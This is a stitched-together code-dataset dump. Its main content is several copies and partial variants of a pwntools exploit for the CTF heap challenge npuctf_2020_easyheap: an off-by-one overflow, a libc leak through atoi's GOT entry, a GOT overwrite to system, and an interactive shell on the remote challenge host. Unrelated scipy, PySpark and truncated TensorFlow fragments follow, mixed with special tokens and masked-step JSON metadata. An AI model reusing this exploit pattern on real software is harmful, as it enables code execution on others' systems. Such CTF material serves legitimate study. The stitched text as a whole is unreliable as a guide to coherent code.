system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr', libc_addr)
show_addr('system_addr', system_addr)
edit(1, p64(system_addr))
sh.interactive()
<|reserved_special_token_1|>
from pwn import *
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
def show(index):
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Index :', str(index))
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn', 27634)
add(24, 'A' * 8)
add(24, 'B' * 8)
edit(0, 'A' * 24 + 'A')
delete(1)
add(56, 'A' * 8)
payload = 'A' * 16 + p64(0) + p64(33)
payload += p64(56) + p64(elf.got['atoi'])
edit(1, payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8, '\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr', libc_addr)
show_addr('system_addr', system_addr)
edit(1, p64(system_addr))
sh.interactive()
<|reserved_special_token_1|>
#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-
#Author: Squarer
#Time: 2020.11.15 20.20.51
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*
#context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
def add(size,cont):
sh.sendlineafter('Your choice :','1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
sh.sendlineafter('Content:',str(cont))
def edit(index,cont):
sh.sendlineafter('Your choice :','2')
sh.sendlineafter('Index :',str(index))
sh.sendafter('Content: ',str(cont))
def delete(index):
sh.sendlineafter('Your choice :','4')
sh.sendlineafter('Index :',str(index))
def show(index):
sh.sendlineafter('Your choice :','3')
sh.sendlineafter('Index :',str(index))
def show_addr(name,addr):
log.success('The '+str(name)+' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn',27634)
#extending
add(0x18,'A'*8)
add(0x18,'B'*8)
edit(0,'A'*0x18+'\x41')
delete(1)
#leaking
add(0x38,'A'*8) #1
payload = 'A'*0x10 + p64(0) + p64(0x21)
payload += p64(0x38) + p64(elf.got['atoi'])
edit(1,payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr',libc_addr)
show_addr('system_addr',system_addr)
#hijacking
edit(1,p64(system_addr))
#gdb.attach(sh,'b*0x400E6D')
sh.interactive()
|
flexible
|
{
"blob_id": "eeedf4930a7fa58fd406a569db6281476c2e3e35",
"index": 4870,
"step-1": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\n<mask token>\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\n<mask token>\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\n<mask token>\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-3": "<mask token>\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-4": "from pwn import *\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-5": "#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Squarer\n#Time: 2020.11.15 20.20.51\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\n#context.log_level = 'debug'\ncontext.arch = 'amd64'\n\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n#libc=ELF('/lib/i386-linux-gnu/libc.so.6')\n\ndef add(size,cont):\n\tsh.sendlineafter('Your choice :','1')\n\tsh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))\n\tsh.sendlineafter('Content:',str(cont))\n\ndef edit(index,cont):\n\tsh.sendlineafter('Your choice :','2')\n\tsh.sendlineafter('Index :',str(index))\n\tsh.sendafter('Content: ',str(cont))\n\ndef delete(index):\n\tsh.sendlineafter('Your choice :','4')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show(index):\n\tsh.sendlineafter('Your choice :','3')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show_addr(name,addr):\n\tlog.success('The '+str(name)+' Addr:' + str(hex(addr)))\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn',27634)\n\n#extending\nadd(0x18,'A'*8)\nadd(0x18,'B'*8)\nedit(0,'A'*0x18+'\\x41')\ndelete(1)\n\n#leaking\nadd(0x38,'A'*8) #1\npayload = 'A'*0x10 + p64(0) + p64(0x21)\npayload += p64(0x38) + p64(elf.got['atoi'])\nedit(1,payload)\n\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8,'\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr',libc_addr)\nshow_addr('system_addr',system_addr)\n\n#hijacking\nedit(1,p64(system_addr))\n#gdb.attach(sh,'b*0x400E6D')\n\nsh.interactive()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
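# A dependency-free sketch of the leak arithmetic in the exploit above: it
# reads six raw bytes of a little-endian address off the socket and pads them
# to eight before unpacking (pwntools' u64 wraps struct the same way). The
# leaked bytes and both libc offsets below are made-up illustrative values,
# not the real libc-2.27 offsets.
import struct

def u64_padded(raw: bytes) -> int:
    # Unpack up to 8 little-endian bytes as an unsigned 64-bit integer.
    return struct.unpack('<Q', raw.ljust(8, b'\x00'))[0]

leaked = b'\x20\x79\xa5\xf7\xff\x7f'   # 6-byte leak as received from the remote (invented)
atoi_addr = u64_padded(leaked)
libc_base = atoi_addr - 0x40680        # hypothetical offset of atoi in the target libc
system_addr = libc_base + 0x4f440      # hypothetical offset of system
print(hex(atoi_addr), hex(libc_base), hex(system_addr))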
<|reserved_special_token_0|>
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
<|reserved_special_token_0|>
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
<|reserved_special_token_0|>
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
<|reserved_special_token_0|>
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
def f_9(x, a, b):
return np.exp(-(x - a) ** 2 / (2 * b ** 2))
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
fname = 'Exam_2018_Prob1.txt'
data = np.loadtxt(fname)
z = data[:, 0]
a_bound = -10, 0
b_bound = -10, 10
c_bound = 4000, 8000
n_bound = 0, None
p_bound = 0, None
mu_bound = 0, None
data_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))
print(data_0)
x = np.arange(20, 27, 0.01)
y = f_1(x, -3)
plt.plot(x, y + 0.2)
plt.hist(z, bins=200, normed=True)
plt.show()
binwidth = 0.1
n_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from scipy.stats import chisquare, chi2, binom, poisson
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
def f_9(x, a, b):
return np.exp(-(x - a) ** 2 / (2 * b ** 2))
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
fname = 'Exam_2018_Prob1.txt'
data = np.loadtxt(fname)
z = data[:, 0]
a_bound = -10, 0
b_bound = -10, 10
c_bound = 4000, 8000
n_bound = 0, None
p_bound = 0, None
mu_bound = 0, None
data_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))
print(data_0)
x = np.arange(20, 27, 0.01)
y = f_1(x, -3)
plt.plot(x, y + 0.2)
plt.hist(z, bins=200, normed=True)
plt.show()
binwidth = 0.1
n_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from scipy.stats import chisquare, chi2, binom, poisson
def f_1(x, a):
return (1 / (x + 5)) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * (x ** 2))
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
def f_9(x, a, b):
return np.exp(-(x - a) ** 2 / (2 * (b ** 2)))
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log((pdf))
result = np.sum(-ln_pdf)
return result
fname = 'Exam_2018_Prob1.txt'
data = np.loadtxt(fname)
z = data[:, 0]
a_bound = (-10, 0)
b_bound = (-10, 10)
c_bound = (4000, 8000)
n_bound = (0, None)
p_bound = (0, None)
mu_bound = (0, None)
data_0 = minimize(my_pdf, [1, ], args=(z), method='SLSQP',
bounds=(a_bound, ))
print(data_0)
x = np.arange(20, 27, 0.01)
y = f_1(x, -3)
plt.plot(x, y+0.2)
plt.hist(z, bins=200, normed=True)
plt.show()
binwidth = 0.1
n_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)
# Chi2 calculator
# observed_values, bins, _ = plt.hist(data[:, 2], bins=n_bins)
# plt.show()
# We normalize by multiplyting the length of the data with the binwidth
# expected_values = poisson.pmf(bins, data_0.x[0]) * len(data)
# print(observed_values[observed_values!=0])
# print(expected_values[expected_values!=0])
# print(chisquare(observed_values[observed_values!=0], f_exp=expected_values[expected_values!=0]))
# print('Threshold value ', chi2.isf(0.05, 18))
# x = np.arange(-1, 1, 0.01)
# y = f_6(x, data_0.x[0], data_0.x[1])
# plt.plot(x,y)
# plt.show()
|
flexible
|
{
"blob_id": "27edc753ebb9d60715a2ffa25d77e69ef363d010",
"index": 3568,
"step-1": "<mask token>\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\n<mask token>\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\n<mask token>\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\n<mask token>\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * b ** 2))\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\nz = data[:, 0]\na_bound = -10, 0\nb_bound = -10, 10\nc_bound = 4000, 8000\nn_bound = 0, None\np_bound = 0, None\nmu_bound = 0, None\ndata_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y + 0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * b ** 2))\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\nz = data[:, 0]\na_bound = -10, 0\nb_bound = -10, 10\nc_bound = 4000, 8000\nn_bound = 0, None\np_bound = 0, None\nmu_bound = 0, None\ndata_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y + 0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\n\n\ndef f_1(x, a):\n return (1 / (x + 5)) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * (x ** 2))\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3)) \n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * (b ** 2)))\n\ndef my_pdf(VAR, x):\n a = VAR\n\n pdf = f_1(x, a)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\n\nz = data[:, 0]\n\na_bound = (-10, 0)\nb_bound = (-10, 10)\nc_bound = (4000, 8000)\n\nn_bound = (0, None)\np_bound = (0, None)\n\nmu_bound = (0, None)\n\ndata_0 = minimize(my_pdf, [1, ], args=(z), method='SLSQP',\n bounds=(a_bound, ))\n\n\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y+0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n\n# Chi2 calculator\n# observed_values, bins, _ = plt.hist(data[:, 2], bins=n_bins)\n\n# plt.show()\n# We normalize by multiplyting the length of the data with the binwidth\n# expected_values = poisson.pmf(bins, data_0.x[0]) * len(data) \n\n# print(observed_values[observed_values!=0])\n# print(expected_values[expected_values!=0])\n# print(chisquare(observed_values[observed_values!=0], f_exp=expected_values[expected_values!=0]))\n# print('Threshold value ', chi2.isf(0.05, 18))\n\n\n# x = np.arange(-1, 1, 0.01)\n# y = f_6(x, data_0.x[0], data_0.x[1]) \n# plt.plot(x,y)\n# plt.show()\n\n",
"step-ids": [
6,
9,
12,
13,
14
]
}
|
[
6,
9,
12,
13,
14
] |
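# A sketch of the same maximum-likelihood pattern as the record above, on
# synthetic data. The record's my_pdf sums -log(f_1(x, a)), but f_1 is not a
# normalized density, so np.log can see non-positive values; the version below
# uses a properly normalized Gaussian to show the pattern cleanly. All numbers
# here are invented.
import numpy as np
from scipy.optimize import minimize

rng = np.random.default_rng(0)
x = rng.normal(loc=23.5, scale=0.8, size=2000)  # stand-in for the data column

def nll(params, x):
    # Summed negative log-likelihood of a Gaussian with mean mu, width sigma.
    mu, sigma = params
    pdf = np.exp(-(x - mu) ** 2 / (2 * sigma ** 2)) / (np.sqrt(2 * np.pi) * sigma)
    return -np.sum(np.log(pdf))

res = minimize(nll, x0=[20.0, 1.0], args=(x,), method='SLSQP',
               bounds=[(None, None), (1e-6, None)])
print(res.x)  # recovers roughly [23.5, 0.8]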
from pyspark import SparkContext, SparkConf
conf = SparkConf().setAppName("same_host").setMaster("local")
sc = SparkContext(conf=conf)
julyFirstLogs = sc.textFile("/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv")
augFirstLogs = sc.textFile("/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv")
julyFirstLogs = julyFirstLogs.map(lambda line: line.split("\t")[0])
augFirstLogs = augFirstLogs.map(lambda line: line.split("\t")[0])
intersection = julyFirstLogs.intersection(augFirstLogs)
cleanedHostIntersection = intersection.filter(lambda host: host != "host")
cleanedHostIntersection.saveAsTextFile("out/nasa_logs_same_hosts.csv")
|
normal
|
{
"blob_id": "36fce3837e0341d94ff6099a06be8cf757a1cfa9",
"index": 3596,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncleanedHostIntersection.saveAsTextFile('out/nasa_logs_same_hosts.csv')\n",
"step-3": "<mask token>\nconf = SparkConf().setAppName('same_host').setMaster('local')\nsc = SparkContext(conf=conf)\njulyFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv')\naugFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv')\njulyFirstLogs = julyFirstLogs.map(lambda line: line.split('\\t')[0])\naugFirstLogs = augFirstLogs.map(lambda line: line.split('\\t')[0])\nintersection = julyFirstLogs.intersection(augFirstLogs)\ncleanedHostIntersection = intersection.filter(lambda host: host != 'host')\ncleanedHostIntersection.saveAsTextFile('out/nasa_logs_same_hosts.csv')\n",
"step-4": "from pyspark import SparkContext, SparkConf\nconf = SparkConf().setAppName('same_host').setMaster('local')\nsc = SparkContext(conf=conf)\njulyFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv')\naugFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv')\njulyFirstLogs = julyFirstLogs.map(lambda line: line.split('\\t')[0])\naugFirstLogs = augFirstLogs.map(lambda line: line.split('\\t')[0])\nintersection = julyFirstLogs.intersection(augFirstLogs)\ncleanedHostIntersection = intersection.filter(lambda host: host != 'host')\ncleanedHostIntersection.saveAsTextFile('out/nasa_logs_same_hosts.csv')\n",
"step-5": "from pyspark import SparkContext, SparkConf\n\nconf = SparkConf().setAppName(\"same_host\").setMaster(\"local\")\nsc = SparkContext(conf=conf)\n\njulyFirstLogs = sc.textFile(\"/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv\")\naugFirstLogs = sc.textFile(\"/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv\")\n\n\njulyFirstLogs = julyFirstLogs.map(lambda line: line.split(\"\\t\")[0])\naugFirstLogs = augFirstLogs.map(lambda line: line.split(\"\\t\")[0])\n\nintersection = julyFirstLogs.intersection(augFirstLogs)\ncleanedHostIntersection = intersection.filter(lambda host: host != \"host\")\ncleanedHostIntersection.saveAsTextFile(\"out/nasa_logs_same_hosts.csv\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
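# A sketch of the same host-intersection logic as the Spark job above, but on
# in-memory data so it runs anywhere Spark does (the original depends on two
# local NASA log files). The host names are invented.
from pyspark import SparkConf, SparkContext

conf = SparkConf().setAppName('same_host_demo').setMaster('local[*]')
sc = SparkContext(conf=conf)

july = sc.parallelize(['host\tpath', 'alpha.net\t/a', 'beta.org\t/b'])
august = sc.parallelize(['host\tpath', 'beta.org\t/c', 'gamma.io\t/d'])

july_hosts = july.map(lambda line: line.split('\t')[0])
august_hosts = august.map(lambda line: line.split('\t')[0])

# intersection() deduplicates; the header token 'host' still needs filtering out
same_hosts = july_hosts.intersection(august_hosts).filter(lambda h: h != 'host')
print(same_hosts.collect())  # ['beta.org']
sc.stop()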
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
